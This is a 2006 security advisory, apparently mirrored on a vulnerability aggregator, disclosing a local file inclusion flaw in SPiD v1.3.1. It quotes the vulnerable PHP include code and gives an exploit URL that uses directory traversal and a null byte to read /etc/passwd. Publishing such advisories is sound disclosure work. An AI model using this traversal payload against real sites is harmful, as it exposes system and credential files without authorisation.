Lucene search
NSAG-201-25.02.2006.txt
ποΈΒ 26 Feb 2006Β 00:00:00Reported byΒ nsag.ruTypeΒ 
Β packetstormπΒ packetstormsecurity.comπΒ 42Β Views
NSAG-201-25.02.2006 Advisory on SPiD v1.3.1 vulnerabilit
Show more
`Advisory:
NSAG-ΒΉ201-25.02.2006
Research:
NSA Group [Russian company on Audit of safety & Network security]
Site of Research:
http://www.nsag.ru or http://www.nsag.org
Product:
SPiD v1.3.1
Site of manufacturer:
http://spid.adnx.net/
The status:
19/01/2006 - Publication is postponed.
14/02/2006 - Answer of the manufacturer is absent.
25/02/2006 - Publication of vulnerability.
Original Advisory:
http://www.nsag.ru/vuln/955.html
Risk:
Hide
Description:
Attacker can form the query in URL form ang get the access to the
system files.
Vulnerability code:
+++++++
if (isset($_REQUEST["lang"])) {
$file_lang = $lang_path . "lang_" . $_REQUEST["lang"] . ".php"
if (file_exists($file_lang)) {
include $lang_path . "lang.php";
include $file_lang;
.....
skip
+++++++
Exploit:
http://example.com/spiddir/scan_lang_insert.php?lang=../../../../../../../../etc/passwd%00
More information:
http://www.nsag.ru/vuln/955.html
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
www.nsag.ru
Β«NemesisΒ» Β© 2006
------------------------------------
Nemesis Security Audit Group Β© 2006.
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo26 Feb 2006 00:00Current
7.4High risk
Vulners AI Score7.4